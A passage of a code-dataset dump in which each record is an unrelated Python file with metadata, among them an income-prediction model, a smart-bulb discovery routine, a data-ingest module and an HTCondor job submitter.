http_response_cls=http_response_cls)\n","sub_path":"modernrpc/handlers/xmlhandler.py","file_name":"xmlhandler.py","file_ext":"py","file_size_in_byte":3927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"17405266","text":"import json\nimport math\nfrom data_parsing import MAX_AGE, MAX_HOURS\n\nwith open(\"weights.json\", \"r\") as file:\n\tWEIGHTS = json.load(file)\n\ndef predict(age: int, has_college_degree: bool, is_married: bool, is_male: bool,\n\tweekly_work_hours: int) -> float:\n\t'''\n\tPredicts whether a person makes at least 50k dollars a year or not.\n\t:returns: The probability that this person makes over 50k dollars.\n\t'''\n\n\t# We have to standardize my input data the same way we did when training the model.\n\tage = age / MAX_AGE\n\tweekly_work_hours = weekly_work_hours / MAX_HOURS\n\n\ts = (age*WEIGHTS[0] + has_college_degree*WEIGHTS[1] + is_married*WEIGHTS[2] 
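# A standalone sketch of the logistic score computed above: dot the scaled
# features with the weights, add the bias, squash with the sigmoid. The
# weight values and the 90/99 scaling constants here are placeholders, not
# the trained WEIGHTS or the real MAX_AGE/MAX_HOURS.
import math

def sigmoid(x):
    return 1 / (1 + math.exp(-x))

weights = [0.5, 1.0, 0.8, 0.2, 1.5, -2.0]             # last entry acts as bias
features = [30 / 90.0, True, False, True, 40 / 99.0]  # age, degree, married, male, hours
s = sum(w * f for w, f in zip(weights, features)) + weights[-1]
print(sigmoid(s))  # probability of earning over 50k a year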
+\n\t\t\tis_male*WEIGHTS[3] + weekly_work_hours*WEIGHTS[4] + WEIGHTS[5])\n\ta = sigmoid(s)\n\treturn a\n\n\ndef sigmoid(x):\n\treturn 1 / (1 + math.exp(-x))","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"565008273","text":"from __future__ import division, print_function, absolute_import\nfrom collections import defaultdict\nimport numpy as np\nfrom treetime import config as ttconf\nfrom .seq_utils import alphabets, profile_maps, alphabet_synonyms, seq2array, seq2prof\nfrom .gtr import GTR\nfrom .treeanc import TreeAnc\n\n\nclass SeqGen(TreeAnc):\n def __init__(self, *args, **kwargs):\n super(SeqGen, self).__init__(reduce_alignment=False, **kwargs)\n\n\n def sample_from_profile(self, p):\n cum_p = p.cumsum(axis=1).T\n prand = np.random.random(p.shape[0])\n seq = self.gtr.alphabet[np.argmax(cum_p>prand, axis=0)]\n return seq\n\n\n def evolve(self, root_seq=None):\n self.seq_len = self.gtr.seq_len\n if root_seq:\n self.tree.root.sequence = seq2array(root_seq)\n else:\n self.tree.root.sequence = self.sample_from_profile(self.gtr.Pi.T)\n\n for n in self.tree.get_nonterminals(order='preorder'):\n profile_p = seq2prof(n.sequence, self.gtr.profile_map)\n for c in n:\n profile = self.gtr.evolve(profile_p, c.branch_length)\n c.sequence = self.sample_from_profile(profile)\n self.make_reduced_alignment()\n\n for n in self.tree.find_clades():\n if n==self.tree.root:\n n.mutations=[]\n else:\n n.mutations = self.get_mutations(n)\n\n\n def get_aln(self, internal=False):\n from Bio import SeqRecord, Seq\n from Bio.Align import MultipleSeqAlignment\n\n tmp = []\n for n in self.tree.get_terminals():\n if n.is_terminal() or internal:\n tmp.append(SeqRecord.SeqRecord(id=n.name, name=n.name, description='', seq=Seq.Seq(''.join(n.sequence))))\n\n return MultipleSeqAlignment(tmp)\n\n\n","sub_path":"treetime/seqgen.py","file_name":"seqgen.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"16508389","text":"from typing import Any, Dict, List\nfrom argparse import ArgumentParser\nimport socket\nfrom chroma_feedback import helper, wording\nfrom .light import get_lights, process_lights\n\nARGS = None\n\n\ndef init(program : ArgumentParser) -> None:\n\tglobal ARGS\n\n\tif not ARGS:\n\t\tip = None\n\n\t\tif not helper.has_argument('--xiaomi-yeelight-ip'):\n\t\t\tip = discover_ips()\n\t\tif ip:\n\t\t\tprogram.add_argument('--xiaomi-yeelight-ip', default = ip)\n\t\telse:\n\t\t\tprogram.add_argument('--xiaomi-yeelight-ip', action = 'append', required = True)\n\tARGS = helper.get_first(program.parse_known_args())\n\n\ndef run(status : str) -> List[Dict[str, Any]]:\n\tlights = get_lights(ARGS.xiaomi_yeelight_ip)\n\n\tif not lights:\n\t\texit(wording.get('light_no') + wording.get('exclamation_mark'))\n\treturn process_lights(lights, status)\n\n\ndef discover_ips() -> List[str]:\n\tmessage =\\\n\t[\n\t\t'M-SEARCH * HTTP/1.1',\n\t\t'HOST: 239.255.255.250:1982',\n\t\t'MAN: \"ssdp:discover\"',\n\t\t'ST: wifi_bulb'\n\t]\n\tdiscovery = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n\tdiscovery.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 32)\n\tdiscovery.settimeout(2)\n\tdiscovery.sendto('\\r\\n'.join(message).encode(), ('239.255.255.250', 1982))\n\tips = []\n\n\ttry:\n\t\tips.append(helper.get_first(discovery.recvfrom(65507)[1]))\n\texcept 
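# A toy rerun of the cumulative-sum trick in sample_from_profile above: one
# uniform draw per site, mapped through that site's cumulative distribution;
# alphabet and profile values here are made up.
import numpy as np

alphabet = np.array(list('ACGT'))
p = np.array([[0.7, 0.1, 0.1, 0.1],    # one row per site, rows sum to 1
              [0.1, 0.1, 0.1, 0.7]])
cum_p = p.cumsum(axis=1).T             # shape (letters, sites)
prand = np.random.random(p.shape[0])   # one uniform draw per site
# argmax picks the first letter whose cumulative probability exceeds the draw
seq = alphabet[np.argmax(cum_p > prand, axis=0)]
print(''.join(seq))                    # 'AT' with probability 0.49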
socket.timeout:\n\t\tprint(wording.get('ip_no').format('XIAOMI YEELIGHT') + wording.get('exclamation_mark'))\n\treturn ips\n","sub_path":"chroma_feedback/consumer/xiaomi_yeelight/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"321760601","text":"import gym\nimport gymfc\nimport numpy as np\nenv=gym.make('AttFC_GyroErr-MotorVel_M4_E-v1')\nenv.render()\nac=np.array([0.1,0.1,0.1,0.1])\nwhile True:\n\tob, reward, done, info = env.step(ac)\n\tprint(reward)\n\tif done:\n\t\tenv.reset()\n\t\t\n\t\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"590579649","text":"f = open(\"num_bags.csv\",\"w\")\r\n\r\n# ask the passenger for the amount of bags they are taking\r\nwhile True:\r\n try:\r\n num_bags = int(input('Number of bags: '))\r\n if num_bags < 0 or num_bags > 2:\r\n raise ValueError\r\n print(num_bags, file=f)\r\n break\r\n except ValueError:\r\n print('Invalid number of bags. You can take up to 2 bags.')\r\n","sub_path":"number_of_bags.py","file_name":"number_of_bags.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"580391644","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\nimport logging\nimport os\nimport subprocess\n\nfrom .util_misc import CockpitSingleton\n\n\nclass ProjectEnv(CockpitSingleton):\n def __init__(self, project_name, out_path=os.path.abspath('..'), debug_level='debug'):\n self.project_name = project_name\n self.debug_level = debug_level\n self.build_root = os.path.abspath('.')\n self.project_root = out_path\n self.project_list_dir = os.path.join(self.build_root, 'projects')\n logging.debug(self.project_list_dir)\n self.project_spec = os.path.join(self.project_list_dir, self.project_name)\n self.out_root = os.path.join(self.project_root, 'out')\n self.project_out = os.path.join(self.out_root, self.project_name)\n logging.debug(self.project_out)\n self.project_conf_out = os.path.join(self.project_out, 'configs')\n\n def setup(self):\n os.makedirs(self.project_root, exist_ok=True)\n os.makedirs(self.out_root, exist_ok=True)\n os.makedirs(self.project_out, exist_ok=True)\n\n env_setup_path = os.path.join(self.project_out, 'envsetup.sh')\n logging.debug(env_setup_path)\n if os.path.exists(env_setup_path):\n os.remove(env_setup_path)\n\n os.makedirs(self.project_out, exist_ok=True)\n with open(env_setup_path, 'a+') as es:\n es.write(\"#!/usr/bin/sh \\n\\n\")\n es.write(\"export PROJECT_DEBUG_LEVEL=\" + self.debug_level + \"\\n\")\n es.write(\"export PROJECT_NAME=\" + self.project_name + \"\\n\")\n es.write(\"export PROJECT_ROOT=\" + self.project_root + \"\\n\")\n es.write(\"export BUILD_ROOT=\" + self.build_root + \"\\n\")\n es.write(\"export PROJECT_CONF=\" + self.project_list_dir + \"\\n\")\n es.write(\"export OUT_ROOT=\" + self.out_root + \"\\n\")\n es.write(\"export PROJECT_OUT_ROOT=\" + self.project_out + \"\\n\")\n es.write(\"export PROJECT_CONF_OUT=\" + self.project_conf_out + \"\\n\")\n\n env_setup_path = os.path.join(self.project_out, 'envsetup.sh')\n cmd = \"cat {}\".format(env_setup_path)\n ret, output = subprocess.getstatusoutput(cmd)\n 
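# A trimmed, standalone version of the SSDP multicast probe in discover_ips
# above; the port (1982) and search target are Yeelight-specific values taken
# from the sample, the rest is ordinary UDP multicast boilerplate.
import socket

message = '\r\n'.join([
    'M-SEARCH * HTTP/1.1',
    'HOST: 239.255.255.250:1982',
    'MAN: "ssdp:discover"',
    'ST: wifi_bulb',
])
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 32)
sock.settimeout(2)
sock.sendto(message.encode(), ('239.255.255.250', 1982))
try:
    data, (ip, port) = sock.recvfrom(65507)
    print('bulb at', ip)
except socket.timeout:
    print('no bulb answered')
finally:
    sock.close()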
logging.info(output)\n","sub_path":"project/cockpit_build/utils/project_env.py","file_name":"project_env.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"549500248","text":"import os\nimport re\nimport csv\nimport json\nimport codecs\nimport logging\nimport traceback\n\nimport xml.etree.ElementTree as x_etree\n\nfrom synapse.common import *\nfrom synapse.eventbus import EventBus\n\nimport synapse.axon as s_axon\nimport synapse.gene as s_gene\nimport synapse.compat as s_compat\nimport synapse.dyndeps as s_dyndeps\n\nimport synapse.lib.scope as s_scope\nimport synapse.lib.syntax as s_syntax\nimport synapse.lib.scrape as s_scrape\nimport synapse.lib.datapath as s_datapath\nimport synapse.lib.encoding as s_encoding\nimport synapse.lib.filepath as s_filepath\nimport synapse.lib.openfile as s_openfile\n\nlogger = logging.getLogger(__name__)\n\ndef _xml_stripns(e):\n\n # believe it or not, this is the recommended\n # way to strip XML namespaces...\n if e.tag.find('}') != -1:\n e.tag = e.tag.split('}')[1]\n\n for name,valu in e.attrib.items():\n if name.find('}') != -1:\n e.attrib[name.split('{')[1]] = valu\n\n for x in e:\n _xml_stripns(x)\n\n\ndef _fmt_xml(fd,gest):\n #TODO stream XML ingest for huge files\n elem = x_etree.fromstring(fd.read())\n _xml_stripns(elem)\n yield {elem.tag:elem}\n\ndef _fmt_csv(fd,gest):\n\n opts = {}\n\n quot = gest.get('format:csv:quote')\n cmnt = gest.get('format:csv:comment')\n dial = gest.get('format:csv:dialect')\n delm = gest.get('format:csv:delimiter')\n\n if dial != None:\n opts['dialect'] = dial\n\n if delm != None:\n opts['delimiter'] = delm\n\n if quot != None:\n opts['quotechar'] = quot\n\n # do we need to strip a comment char?\n if cmnt != None:\n\n # use this if we need to strip comments\n # (but avoid it otherwise for perf )\n def lineiter():\n for line in fd:\n if not line.startswith(cmnt):\n yield line\n\n return csv.reader(lineiter(),**opts)\n\n return csv.reader(fd,**opts)\n\ndef _fmt_lines(fd,gest):\n\n skipre = None\n mustre = None\n\n lowr = gest.get('format:lines:lower')\n cmnt = gest.get('format:lines:comment','#')\n\n skipstr = gest.get('format:lines:skipre')\n if skipstr != None:\n skipre = re.compile(skipstr)\n\n muststr = gest.get('format:lines:mustre')\n if muststr != None:\n mustre = re.compile(muststr)\n\n for line in fd:\n\n line = line.strip()\n\n if not line:\n continue\n\n if line.startswith(cmnt):\n continue\n\n if lowr:\n line = line.lower()\n\n if skipre != None and skipre.match(line) != None:\n continue\n\n if mustre != None and mustre.match(line) == None:\n continue\n\n yield line\n\ndef _fmt_json(fd,info):\n yield json.loads( fd.read() )\n\ndef _fmt_jsonl(fd,info):\n for line in fd:\n yield json.loads(line)\n\nfmtyielders = {\n 'csv':_fmt_csv,\n 'xml':_fmt_xml,\n 'json':_fmt_json,\n 'jsonl':_fmt_jsonl,\n 'lines':_fmt_lines,\n}\n\nfmtopts = {\n 'xml':{'mode':'r','encoding':'utf8'},\n 'csv':{'mode':'r','encoding':'utf8'},\n 'json':{'mode':'r','encoding':'utf8'},\n 'jsonl':{'mode':'r','encoding':'utf8'},\n 'lines':{'mode':'r','encoding':'utf8'},\n}\n\ndef addFormat(name, fn, opts):\n '''\n Add an additional ingest file format\n '''\n fmtyielders[name] = fn\n fmtopts[name] = opts\n\ndef iterdata(fd,**opts):\n '''\n Iterate through the data provided by a file like object.\n\n Optional parameters may be used to control how the data\n is deserialized.\n\n Example:\n\n with open('foo.csv','rb') as fd:\n\n for row in iterdata(fd, 
format='csv', encoding='utf8'):\n\n dostuff(row)\n\n '''\n fmt = opts.get('format','lines')\n fopts = fmtopts.get(fmt,{})\n\n # set default options for format\n for opt,val in fopts.items():\n opts.setdefault(opt,val)\n\n ncod = opts.get('encoding')\n if ncod != None:\n fd = codecs.getreader(ncod)(fd)\n\n fmtr = fmtyielders.get(fmt)\n if fmtr == None:\n raise NoSuchImpl(name=fmt,knowns=fmtyielders.keys())\n\n for item in fmtr(fd,opts):\n yield item\n\n fd.close()\n\nclass Ingest(EventBus):\n '''\n An Ingest allows modular data acquisition and cortex loading.\n '''\n def __init__(self, info, axon=None):\n EventBus.__init__(self)\n self._i_res = {}\n self._i_info = info\n self._i_axon = axon\n\n self._i_glab = s_gene.GeneLab()\n\n self._tvar_cache = {}\n self._tvar_regex = re.compile('{{(\\w+)}}')\n\n def _re_compile(self, regex):\n ret = self._i_res.get(regex)\n if ret == None:\n self._i_res[regex] = ret = re.compile(regex)\n return ret\n\n def get(self, name, defval=None):\n return self._i_info.get(name,defval)\n\n def set(self, name, valu):\n self._i_info[name] = valu\n\n def _iterDataSorc(self, path, info):\n\n if not os.path.isabs(path):\n basedir = self.get('basedir')\n if basedir:\n path = os.path.join(basedir,path)\n\n onfo = info.get('open')\n for fd in s_filepath.openfiles(path,mode='rb'):\n yield iterdata(fd,**onfo)\n\n def ingest(self, core, data=None):\n '''\n Ingest the data from this definition into the specified cortex.\n '''\n scope = s_scope.Scope()\n if data != None:\n root = s_datapath.initelem(data)\n gest = self._i_info.get('ingest')\n self._ingDataInfo(core, root, gest, scope)\n return\n\n for path,info in self.get('sources'):\n\n scope.enter()\n\n scope.add('tags', *info.get('tags',()) )\n\n gest = info.get('ingest')\n if gest == None:\n gest = self._i_info.get('ingest')\n\n if gest == None:\n raise Exception('Ingest Info Not Found: %s' % (path,))\n\n for datasorc in self._iterDataSorc(path,info):\n for data in datasorc:\n root = s_datapath.initelem(data)\n self._ingDataInfo(core, root, gest, scope)\n\n def _ingMergScope(self, core, data, info, scope):\n\n vard = info.get('vars')\n if vard != None:\n for varn,vnfo in vard:\n valu = self._get_prop(core,data,vnfo,scope)\n scope.set(varn,valu)\n\n for tagv in info.get('tags',()):\n\n # if it's a simple tag string, add and move along\n if s_compat.isstr(tagv):\n scope.add('tags',tagv.lower())\n continue\n\n # otherwise it's an iteration compatible prop dict\n tags = [ t.lower() for t in self._iter_prop(core,data,tagv,scope) ]\n\n scope.add('tags',*tags)\n\n def _ingFileInfo(self, core, data, info, scope):\n\n with scope:\n\n self._ingMergScope(core,data,info,scope)\n\n cond = info.get('cond')\n if cond != None and not self._isCondTrue(cond,scope):\n return\n\n path = info.get('path')\n\n byts = data.valu(path)\n\n dcod = info.get('decode')\n if dcod != None:\n byts = s_encoding.decode(dcod,byts)\n\n hset = s_axon.HashSet()\n hset.update(byts)\n\n iden,props = hset.guid()\n\n mime = info.get('mime')\n if mime != None:\n props['mime'] = mime\n\n tufo = core.formTufoByProp('file:bytes',iden,**props)\n\n self.fire('gest:prog', act='file')\n\n for tag in scope.iter('tags'):\n core.addTufoTag(tufo,tag)\n self.fire('gest:prog', act='tag')\n\n def _ingFormInfo(self, core, data, info, scope):\n\n with scope:\n\n try:\n\n form = info.get('form')\n self._ingMergScope(core,data,info,scope)\n\n cond = info.get('cond')\n if cond != None and not self._isCondTrue(cond,scope):\n return\n\n valu = self._get_prop(core,data,info,scope)\n if 
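# A minimal sketch of registering a custom format through addFormat above: a
# tab-separated yielder wired up the same way as the built-in csv and lines
# handlers ('tsv' and _fmt_tsv are illustrative names).
def _fmt_tsv(fd, gest):
    # gest carries per-format options; plain TSV needs none of them.
    for line in fd:
        yield line.rstrip('\n').split('\t')

addFormat('tsv', _fmt_tsv, {'mode': 'r', 'encoding': 'utf8'})

# with open('foo.tsv', 'rb') as fd:
#     for row in iterdata(fd, format='tsv'):
#         dostuff(row)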
valu == None:\n return\n\n tufo = core.formTufoByFrob(form,valu)\n if tufo == None:\n return\n\n self.fire('gest:prog', act='form')\n\n props = {}\n for prop,pnfo in info.get('props',{}).items():\n valu = self._get_prop(core,data,pnfo,scope)\n if valu == None:\n continue\n\n props[prop] = valu\n\n if props:\n core.setTufoFrobs(tufo,**props)\n self.fire('gest:prog', act='set')\n\n for tag in scope.iter('tags'):\n core.addTufoTag(tufo,tag)\n self.fire('gest:prog', act='tag')\n\n except Exception as e:\n traceback.print_exc()\n core.logCoreExc(e,subsys='ingest')\n\n def _ingDataInfo(self, core, data, info, scope):\n\n with scope:\n\n self._ingMergScope(core,data,info,scope)\n\n cond = info.get('cond')\n if cond != None and not self._isCondTrue(cond,scope):\n return\n\n self.fire('gest:prog', act='data')\n\n # extract files embedded within the data structure\n for flfo in info.get('files',()):\n self._ingFileInfo(core,data,flfo,scope)\n\n for cond,cnfo in info.get('conds',()):\n if not self._isCondTrue(cond,scope):\n continue\n self._ingDataInfo(core,data,cnfo,scope)\n\n # iterate and create any forms at our level\n for form,fnfo in info.get('forms',()):\n fnfo.setdefault('form',form)\n self._ingFormInfo(core,data,fnfo,scope)\n\n # handle explicit nested iterators\n for path,tifo in info.get('iters',()):\n for base in data.iter(path):\n self._ingDataInfo(core, base, tifo, scope)\n\n def _isCondTrue(self, cond, scope):\n expr = self._i_glab.getGeneExpr(cond)\n return bool( expr( scope ) )\n\n def _iter_prop(self, core, data, info, scope):\n\n cond = info.get('cond')\n if cond != None and not self._isCondTrue(cond,scope):\n return\n\n path = info.get('iter')\n\n if path == None:\n\n valu = self._get_prop(core, data, info, scope)\n if valu != None:\n yield valu\n\n return\n\n for base in data.iter(path):\n\n with scope:\n\n self._ingMergScope(core,base,info,scope)\n valu = self._get_prop(core, base, info, scope)\n if valu == None:\n continue\n\n yield valu\n\n def _getTmplVars(self, text):\n ret = self._tvar_cache.get(text)\n if ret == None:\n self._tvar_cache[text] = ret = self._tvar_regex.findall(text)\n return ret\n\n def _get_prop(self, core, base, info, scope):\n\n cond = info.get('cond')\n if cond != None and not self._isCondTrue(cond,scope):\n return\n\n valu = info.get('value')\n if valu != None:\n return valu\n\n if valu == None:\n varn = info.get('var')\n valu = scope.get(varn)\n\n template = info.get('template')\n if template != None:\n\n valu = template\n\n for tvar in self._getTmplVars(template):\n tval = scope.get(tvar)\n if tval == None:\n return None\n\n # FIXME optimize away the following format string\n valu = valu.replace('{{%s}}' % tvar, tval)\n\n if valu == None:\n path = info.get('path')\n valu = base.valu(path)\n\n if valu == None:\n return None\n\n # If we have a regex field, use it to extract valu from the\n # first grouping\n rexs = info.get('regex')\n if rexs != None:\n rexo = self._re_compile(rexs)\n match = rexo.search(valu)\n if match == None:\n return None\n\n groups = match.groups()\n if groups:\n valu = groups[0]\n\n # allow type based normalization here\n cast = info.get('cast')\n if cast != None:\n valu = core.getTypeCast(cast,valu)\n\n # FIXME make a mechanism here for field translation based\n # on an included translation table within the ingest def\n\n pivot = info.get('pivot')\n if pivot != None:\n pivf,pivt = pivot\n\n pivo = core.getTufoByFrob(pivf,valu)\n if pivo == None:\n return None\n\n valu = pivo[1].get(pivt)\n\n return valu\n\ndef 
loadfile(*paths):\n '''\n Load a json ingest def from file and construct an Ingest class.\n\n This routine is useful because it implements the convention\n for adding runtime info to the ingest json to facilitate path\n relative file opening etc...\n '''\n path = genpath(*paths)\n\n # FIXME universal open\n\n with reqfile(path) as fd:\n jsfo = json.loads( fd.read().decode('utf8') )\n\n gest = Ingest(jsfo)\n\n gest.set('basedir', os.path.dirname(path))\n\n return gest\n","sub_path":"synapse/lib/ingest.py","file_name":"ingest.py","file_ext":"py","file_size_in_byte":13164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"82735317","text":"import socket\nimport time\n\nimport imp\nconfig = imp.load_source('config', \"..\\\\config.py\")\ndata_manager = imp.load_source('data_manager', \"..\\\\Storage\\\\Storage.py\")\n\ndef create_connect():\n\tprint (config.SERVER, config.PORT)\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ts.connect((config.SERVER, config.PORT))\n\treturn s\n\ndef Sent_to_host(data):\n\tsocket_name = create_connect()\n\tsocket_name.sendall(data)\n\tsocket_name.close()\n\tdat = data_manager.data_manager()\n\tdat.sent_Host(data)\n\ndef sendToHost(filename, socket_name):\n\tf = open(filename)\n\t#print f.readline()\n\tchuoi = f.readline()\n\twhile chuoi != '':\n\t\tsocket_name.sendall(chuoi)\n\t\tprint \n\t\ttime.sleep(2)\n\t\tchuoi = f.readline()\n\tf.close()\n\tsocket_name.close()\n\n#s = create_connect('localhost',3129)\nSent_to_host(\"hello\")\n#sendToHost(\"D:\\\\demo.txt\", s)\n","sub_path":"Send to Host/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"370273684","text":"from django.urls import path\nfrom . 
import views\n\n\napp_name = 'content'\nurlpatterns = [\n path('', views.index, name='index'),\n path('start/', views.starting_point, name='starting_point'),\n path('mybelts/', views.UserBeltPage.as_view(), name='my-belts'),\n path('start/myquestions/', views.MyQuestions.as_view(), name='my-questions'),\n\n\n]\n\nurlpatterns += [\n\n]","sub_path":"backend/content/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"156128552","text":"import math\nimport utils\n\n\ndef cosine_similarity(vec1, vec2):\n\n utils.check_for_none(vec1, vec2)\n utils.check_for_type(list, vec1, vec2)\n\n v_x_y, v_x_2, v_y_2 = 0.0, 0.0, 0.0\n for v1, v2 in zip(vec1, vec2): # list of int / float\n v_x_y += v1 * v2\n v_x_2 += v1 * v1\n v_y_2 += v2 * v2\n\n return 0.0 if v_x_y == 0 else v_x_y / (math.sqrt(v_x_2) * math.sqrt(v_y_2))\n","sub_path":"rltk/similarity/cosine.py","file_name":"cosine.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"242745600","text":"#!/usr/bin/env python\n# Tai Sakuma \nimport os, sys\nimport subprocess\nimport collections\nimport time\nimport textwrap\nimport getpass\nimport re\nimport logging\n\nimport alphatwirl\nfrom alphatwirl.misc.deprecation import _deprecated_class_method_option\n\nfrom .exec_util import try_executing_until_succeed, compose_shortened_command_for_logging\n\n##__________________________________________________________________||\n# https://htcondor-wiki.cs.wisc.edu/index.cgi/wiki?p=MagicNumbers\nHTCONDOR_JOBSTATUS = {\n 0: \"Unexpanded\",\n 1: \"Idle\",\n 2: \"Running\",\n 3: \"Removed\",\n 4: \"Completed\",\n 5: \"Held\",\n 6: \"Transferring_Output\",\n 7: \"Suspended\"\n}\n\n##__________________________________________________________________||\n## HTCondor Manual:\n## 2.5 Submitting a Job\n## http://research.cs.wisc.edu/htcondor/manual/v8.4/2_5Submitting_Job.html\n##\n## condor_submit command manual\n## including complete description of submit description file\n## http://research.cs.wisc.edu/htcondor/manual/v8.4/condor_submit.html#man-condor-submit\n\n## keys should be in lower case in this dict\nDEFAULT_JOB_DESC_DICT = collections.OrderedDict([\n ('executable', 'run.py'),\n ('output', 'results/$(resultdir)/stdout.$(cluster).$(process).txt'),\n ('error', 'results/$(resultdir)/stderr.$(cluster).$(process).txt'),\n ('log', 'results/$(resultdir)/log.$(cluster).$(process).txt'),\n ('arguments', '$(resultdir).p.gz'),\n ('should_transfer_files', 'YES'),\n ('when_to_transfer_output', 'ON_EXIT'),\n ('transfer_input_files', '$(resultdir).p.gz'),\n ('transfer_output_files', 'results'),\n ('universe', 'vanilla'),\n ('notification', 'Error'),\n ('getenv', 'True'),\n])\n\n##__________________________________________________________________||\nclass HTCondorJobSubmitter(object):\n\n @_deprecated_class_method_option('job_desc_extra', msg='use job_desc_dict instead')\n def __init__(self, job_desc_extra=[ ], job_desc_dict={}):\n\n self.job_desc_dict = DEFAULT_JOB_DESC_DICT.copy()\n for k, v in job_desc_dict.items():\n self.job_desc_dict[k.lower()] = v # not using update() in case\n # job_desc_dict is ordered\n\n self.user_job_desc_dict = job_desc_dict # for test\n\n self.job_desc_extra = job_desc_extra # TODO: to be deleted\n\n self.clusterprocids_outstanding = [ ]\n self.clusterprocids_finished = [ ]\n\n def run(self, workingArea, package_index):\n return 
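# A dependency-free check of the cosine formula implemented above; the first
# pair of vectors is 45 degrees apart, the second is orthogonal.
import math

def cosine(vec1, vec2):
    dot = sum(a * b for a, b in zip(vec1, vec2))
    norm1 = math.sqrt(sum(a * a for a in vec1))
    norm2 = math.sqrt(sum(b * b for b in vec2))
    return 0.0 if dot == 0 else dot / (norm1 * norm2)

assert abs(cosine([1, 0], [1, 1]) - math.cos(math.pi / 4)) < 1e-12
assert cosine([1, 0], [0, 1]) == 0.0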
self.run_multiple(workingArea, [package_index])[0]\n\n def run_multiple(self, workingArea, package_indices):\n\n if not package_indices:\n return [ ]\n\n cwd = os.getcwd()\n os.chdir(workingArea.path)\n\n package_paths = [workingArea.package_path(i) for i in package_indices]\n resultdir_basenames = [os.path.splitext(p)[0] for p in package_paths]\n resultdir_basenames = [os.path.splitext(n)[0] for n in resultdir_basenames]\n resultdirs = [os.path.join('results', n) for n in resultdir_basenames]\n\n for d in resultdirs:\n alphatwirl.mkdir_p(d)\n\n self.job_desc_dict['executable'] = workingArea.executable\n\n extra_input_files = sorted(list(workingArea.extra_input_files))\n if extra_input_files:\n self.job_desc_dict['transfer_input_files'] += ', ' + ', '.join(extra_input_files)\n\n job_desc = '\\n'.join(['{} = {}'.format(k, v) for k, v in self.job_desc_dict.items()])\n job_desc_queue_line = 'queue resultdir in {}'.format(', '.join(resultdir_basenames))\n\n # TODO: delete this line as job_desc_extra will be obsolete\n job_desc = '\\n'.join([job_desc] + self.job_desc_extra)\n\n job_desc = '\\n'.join([job_desc, job_desc_queue_line])\n\n procargs = ['condor_submit']\n\n logger = logging.getLogger(__name__)\n command_display = compose_shortened_command_for_logging(procargs)\n logger.debug('execute: {!r}'.format(command_display))\n\n proc = subprocess.Popen(\n procargs,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE\n )\n\n stdout, stderr = proc.communicate(job_desc)\n stdout = stdout.decode()\n stderr = stderr.decode()\n\n for l in stdout.rstrip().split('\\n'):\n logger.debug(l)\n\n regex = re.compile(\"(\\d+) job\\(s\\) submitted to cluster (\\d+)\", re.MULTILINE)\n njobs = int(regex.search(stdout).groups()[0])\n clusterid = regex.search(stdout).groups()[1]\n # e.g., '3158626'\n\n change_job_priority([clusterid], 10) ## need to make configurable\n\n procid = ['{}'.format(i) for i in range(njobs)]\n # e.g., ['0', '1', '2', '3']\n\n clusterprocids = ['{}.{}'.format(clusterid, i) for i in procid]\n # e.g., ['3158626.0', '3158626.1', '3158626.2', '3158626.3']\n\n self.clusterprocids_outstanding.extend(clusterprocids)\n\n os.chdir(cwd)\n\n return clusterprocids\n\n def poll(self):\n \"\"\"check if the jobs are running and return a list of cluster IDs for\n finished jobs\n\n \"\"\"\n\n clusterids = clusterprocids2clusterids(self.clusterprocids_outstanding)\n clusterprocid_status_list = query_status_for(clusterids)\n # e.g., [['1730126.0', 2], ['1730127.0', 2], ['1730129.1', 1], ['1730130.0', 1]]\n\n\n if clusterprocid_status_list:\n clusterprocids, statuses = zip(*clusterprocid_status_list)\n else:\n clusterprocids, statuses = (), ()\n\n clusterprocids_finished = [i for i in self.clusterprocids_outstanding if i not in clusterprocids]\n self.clusterprocids_finished.extend(clusterprocids_finished)\n self.clusterprocids_outstanding[:] = clusterprocids\n\n # logging\n counter = collections.Counter(statuses)\n messages = [ ]\n if counter:\n messages.append(', '.join(['{}: {}'.format(HTCONDOR_JOBSTATUS[k], counter[k]) for k in counter.keys()]))\n if self.clusterprocids_finished:\n messages.append('Finished {}'.format(len(self.clusterprocids_finished)))\n logger = logging.getLogger(__name__)\n logger.info(', '.join(messages))\n\n return clusterprocids_finished\n\n def wait(self):\n \"\"\"wait until all jobs finish and return a list of cluster IDs\n \"\"\"\n sleep = 5\n while self.clusterprocids_outstanding:\n self.poll()\n time.sleep(sleep)\n return 
